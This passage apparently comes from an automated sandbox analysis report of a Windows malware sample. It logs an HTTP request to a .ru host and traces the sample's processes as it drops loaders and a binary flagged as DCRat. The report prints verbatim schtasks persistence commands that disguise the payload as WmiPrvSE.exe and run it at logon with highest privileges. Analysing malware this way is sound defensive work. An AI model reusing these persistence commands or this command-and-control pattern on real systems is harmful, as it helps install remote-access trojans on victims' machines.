                                                Apr 25, 2024 10:21:02.677723885 CEST1289INData Raw: 32 36 2e 38 34 38 20 36 37 2e 35 37 30 38 20 33 32 38 2e 31 38 35 43 37 32 2e 39 32 36 32 20 33 32 39 2e 39 30 33 20 37 39 2e 30 34 36 37 20 33 32 39 2e 31 33 39 20 38 34 2e 34 30 32 31 20 33 32 37 2e 38 30 33 43 38 39 2e 35 36 36 32 20 33 32 36
                                                Data Ascii: 26.848 67.5708 328.185C72.9262 329.903 79.0467 329.139 84.4021 327.803C89.5662 326.466 94.5391 324.748 99.1295 322.265C108.501 317.682 116.726 311.19 123.42 303.17C123.42 308.708 123.42 314.054 123.803 319.592C123.42 319.401 123.229 319.401 12
                                                Apr 25, 2024 10:21:02.922815084 CEST595OUTGET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/css
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:21:03.166531086 CEST1289INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:21:03 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:10:16:55
                                                Start date:25/04/2024
                                                Path:C:\Users\user\Desktop\4c6fK85tK7.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\4c6fK85tK7.exe"
                                                Imagebase:0x400000
                                                File size:4'329'984 bytes
                                                MD5 hash:68DFE1E08B8CC7D19FF72334FDD09DB8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:10:16:56
                                                Start date:25/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\ yberLoad.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\ yberLoad.exe"
                                                Imagebase:0x400000
                                                File size:4'253'696 bytes
                                                MD5 hash:A84070968353EDCC9559F54DEEDD8FE9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 96%, ReversingLabs
                                                • Detection: 86%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:10:16:56
                                                Start date:25/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\MVPLoader.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\MVPLoader.exe"
                                                Imagebase:0x7ff7605b0000
                                                File size:348'160 bytes
                                                MD5 hash:F1F43CF5A79E51BA13EF602B25C63A9E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 0%, ReversingLabs
                                                • Detection: 1%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:3
                                                Start time:10:16:57
                                                Start date:25/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\CyberLoader.exe"
                                                Imagebase:0x7ff7699e0000
                                                File size:3'895'538 bytes
                                                MD5 hash:1B4CF2A40E1387CF97DFBE1303C9619A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 70%, ReversingLabs
                                                • Detection: 61%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:10:16:57
                                                Start date:25/04/2024
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe"
                                                Imagebase:0x190000
                                                File size:147'456 bytes
                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:10:16:57
                                                Start date:25/04/2024
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs"
                                                Imagebase:0x190000
                                                File size:147'456 bytes
                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:6
                                                Start time:10:17:03
                                                Start date:25/04/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" "
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:10:17:03
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:10:17:03
                                                Start date:25/04/2024
                                                Path:C:\msPortRefnetdhcp\componentWininto.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\msPortRefnetdhcp\componentWininto.exe"
                                                Imagebase:0xe30000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1737716392.00000000037C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1747518014.000000001341D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 88%, ReversingLabs
                                                • Detection: 65%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:15
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 13 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:16
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:17
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 14 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:18
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 11 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:19
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:20
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:21
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat"
                                                Imagebase:0x7ff60b1b0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:22
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:23
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\w32tm.exe
                                                Wow64 process (32bit):false
                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                Imagebase:0x7ff7d5f30000
                                                File size:108'032 bytes
                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:26
                                                Start time:10:17:07
                                                Start date:25/04/2024
                                                Path:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Imagebase:0xec0000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1848295221.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 88%, ReversingLabs
                                                • Detection: 65%, Virustotal, Browse
                                                Has exited:true

                                                General

                                                Target ID:27
                                                Start time:10:17:07
                                                Start date:25/04/2024
                                                Path:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Imagebase:0x80000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001B.00000002.1849224298.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001B.00000002.1849224298.000000000266B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                General

                                                Target ID:28
                                                Start time:10:17:12
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:29
                                                Start time:10:17:13
                                                Start date:25/04/2024
                                                Path:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
                                                Imagebase:0x7e0000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.1888221161.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                General

                                                Target ID:31
                                                Start time:10:17:14
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\da4d56e5-dd25-4b11-bec9-392111f2ec60.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:33
                                                Start time:10:17:23
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:35
                                                Start time:10:18:48
                                                Start date:25/04/2024
                                                Path:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                Imagebase:0x8b0000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 88%, ReversingLabs
                                                • Detection: 65%, Virustotal, Browse
                                                Has exited:true

                                                General

                                                Target ID:36
                                                Start time:10:18:50
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:37
                                                Start time:10:18:50
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:38
                                                Start time:10:19:26
                                                Start date:25/04/2024
                                                Path:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                Imagebase:0x930000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                General

                                                Target ID:39
                                                Start time:10:19:29
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:40
                                                Start time:10:19:29
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:41
                                                Start time:10:19:49
                                                Start date:25/04/2024
                                                Path:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                Imagebase:0x280000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.3409082832.0000000002860000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                General

